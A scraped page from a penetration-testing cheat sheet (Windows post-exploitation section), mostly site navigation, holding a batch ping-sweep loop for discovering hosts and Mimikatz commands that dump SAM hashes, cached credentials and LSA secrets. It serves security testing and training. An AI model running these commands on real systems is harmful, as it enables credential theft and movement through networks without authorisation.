📙
📙
📙
📙
CheatSheet Pentesting
Search
⌃
K
📙
📙
📙
📙
CheatSheet Pentesting
Search
⌃
K
💻
In system
Check System Info
File Transfer
Reverse Shell
Post Exploitation
Linux
Windows
Privilege Escalation
Path Hijacking
Cracking
🔢
Ports
Reconnaissance
53 - DNS
80,443 - Web
445 - SMB
389, 636, 3268 - LDAP(S)
🕳
Pivoting
Port Forwarding
Socks proxy
Routing
Fuzzing
Transfer files
Metasploit
📂
Active Directory
Kerberos
Dump NTDS
Tickets
Resources
🎛
Hardware
Physical attacks
◀
Reversing
Rust
Go
🌕
Buffer Overflow
Introduction (Steps)
Stack Based
Resources
🔍
OSINT
Enumeration
🐟
Phishing
Tools
💡
Other
Python
Linux
TTY
Cheatsheets
Reports templates
Powered By
GitBook
Comment on page
Post Exploitation
Windows
Discover hosts in network
arp
-
d
for
/
L
%
a in
(
1
,
1
,
254
)
do
@
start
/
b ping 192
.
168
.
20
.
%
a
-
w 100
-
n 2 >nul
arp
-
a
Mimikatz
privilege::debug
lsadump::sam
lsadump::cache
lsadump::secrets
In system - Previous
Reverse Shell
Next
Linux
Last modified
1mo ago